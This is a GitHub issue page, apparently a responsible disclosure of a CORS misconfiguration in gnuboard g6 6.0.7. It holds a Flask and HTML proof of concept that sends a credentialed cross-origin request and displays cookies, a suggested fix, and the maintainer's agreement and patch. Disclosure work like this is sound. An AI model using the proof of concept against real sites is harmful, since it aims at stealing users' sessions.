Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CORS Misconfiguration 취약점 제보합니다. #626

Open
AkiaCode opened this issue Jul 7, 2024 · 3 comments
Open

CORS Misconfiguration 취약점 제보합니다. #626

AkiaCode opened this issue Jul 7, 2024 · 3 comments
Assignees
@Junanjunan
Labels
bug Something isn't working

Comments

@AkiaCode
Copy link

AkiaCode commented Jul 7, 2024
edited
Loading

Version: 6.0.7

Vuln: CORS Misconfiguration

PoC

from flask import Flask, jsonify, send_from_directory

app = Flask(__name__)

@app.route('/')
def serve_html():
    return send_from_directory('', 'index.html')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8800)
<html>
<body>
    <div id="demo">
        <button type="button" onclick="cors()">Exploit</button>
    </div>
    <script>
        function cors() {
            var xhr = new XMLHttpRequest();
            xhr.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    var cookies = document.cookie;
                    document.getElementById("demo").innerText = "Cookies: " + cookies;
                    alert("Cookies: " + cookies);

                }
            };
            xhr.open("GET", "http://<gnuboardHost>, true);
            xhr.withCredentials = true;
            xhr.send();
        }
    </script>
</body>
</html>

Impact

  • 사용자에게 링크 접속만 해도 세션 탈취가 가능합니다.

Secure Code (core/middleware)
이와 같이 테스트가 아닌 프로덕션 환경에서는 allow_origins에 호스트를 지정 필요

    app.add_middleware(
        CORSMiddleware,
        allow_origins=["http://<gunboardHost>"],
        allow_credentials=True,
        allow_methods=["*"],
        allow_headers=["*"],
    )

Video

video.mp4

ref: b9b6bb7
https://github.com/gnuboard/g6/blob/master/core/middleware.py#L81
@Junanjunan
Copy link
Contributor

@AkiaCode
오픈소스 배포 과정에서는 allow_origins를 모두 허용하였습니다.
프로젝트를 진행하시는 상황에 따라 추가하여 사용하시길 권장드립니다.

@AkiaCode
Copy link
Author

AkiaCode commented Jul 10, 2024
edited
Loading

@Junanjunan
아하, 그렇군요 저는 커밋 내용 중 테스트용으로 모두 허용하도록 추가 글에서 테스트용으로 추가하셨길래, 배포 과정에서 의도되지 않은 로직이 추가된 줄 알았습니다. 그리고, fastapi cors에서는 allow_credentials가 True일 때, allow_origins가 *로 설정할 수 없습니다.

image
ref: https://fastapi.tiangolo.com/ko/tutorial/cors,
https://fastapi.tiangolo.com/tutorial/cors,
https://github.com/tiangolo/fastapi/blob/912524233b535a1d45b54863b2c4e0bd2464b193/docs_src/cors/tutorial001.py#L16

p.s. 해결 방법으로는 하드코딩보다 .env 파일에 CORS config를 추가하여 ALLOW_ORIGINS를 직접 설정할 수 있게 만드는 것이 좋을 것 같습니다.

@Junanjunan
Copy link
Contributor

@AkiaCode
네, 말씀해주신 부분을 다음 패치에 반영하도록 하겠습니다. 감사합니다.

@Junanjunan Junanjunan self-assigned this Jul 10, 2024
Junanjunan added a commit to Junanjunan/g6 that referenced this issue Jul 10, 2024
@Junanjunan
[fix] gnuboard#626 CORS 보안 설정 변경 및 환경변수화
2909ae6
@Junanjunan Junanjunan mentioned this issue Jul 10, 2024
Merged
2 tasks
@Junanjunan Junanjunan added the bug Something isn't working label Jul 10, 2024
Junanjunan added a commit to Junanjunan/g6 that referenced this issue Jul 10, 2024
@Junanjunan
[fix] gnuboard#626 CORS 보안 설정 변경 및 환경변수화
0155cde
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@Junanjunan Junanjunan

Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@AkiaCode @Junanjunan